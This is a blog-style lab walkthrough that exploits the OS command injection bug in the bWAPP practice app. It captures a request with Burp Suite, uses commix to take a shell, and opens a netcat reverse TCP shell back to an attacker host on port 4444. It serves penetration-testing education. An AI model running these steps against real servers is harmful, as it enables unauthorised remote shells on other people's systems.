Exploit Command Injection Vulnearbility with Commix and Netcat

In this article I will show how easily you can hack a web server using commix tool if the severe is suffering from OS command injection vulnerbility.

Attaker: kali Linux
Target: bwapp

Download it from here and install and run it with VM ware.


Being an attacker browser target IP in browse:192.168.0.105/bwapp, now Login with bee:bug as credential and select OS command injection from choose your bug; then click on hack.


Here requested web page gets open where you can execute any command. Now I will start burp suite to capture the request. In order to start intercept click the proxy tab and turn on intercept; don’t forget to run proxy inside the browser. Now give any command like IP: 192.168.0.105 and click on lookup.


Inside burp suite you will get the post request has been captured. Here we have victim’s details which will be helpful for making an attack on its web server. Now select the whole data from POST…….&form=submit then copied it and saved in a text file. I had saved it as os.txt and further use it with commix.


In previous tutorial we had used manual step inside commix to execute the given command for making attack but here the step is more easy and convenience to apply for making an attack. Now Type following command for commix to start attack.

Commix –r /root/Desktop/os.txt

Hit enter or press Y as reply of every question.

From given screenshot you can see I have got the victim’s shell and here I had executed following command to retrieve victim’s detail.

Whoami
Id


In next step I have tried to connect victim from netcat shell; open other terminal and type following command to start listener through netcat : nc –lvp 4444
Now start reverse tcp connection using netcat through commix and follow below steps.
commix(os_shell) > reverse_tcp
commix(reverse_tcp) > set LHOST 192.168.0.104
commix(reverse_tcp) > set LPORT 4444
 Option asks by commix to set backdoor for connection Type ‘1’ for netcat reverse TCP shells.
commix(reverse_tcp) > 1
Option asks by commix to set target Type ‘1’ to use default netcat on target host.
 commix(reverse_tcp) >1


On other terminal you will get reverse connection on netcat again type following command

Whoami
Id

Here you will see the result of commix shell and netcat is exactly same.


0 comments:

Post a Comment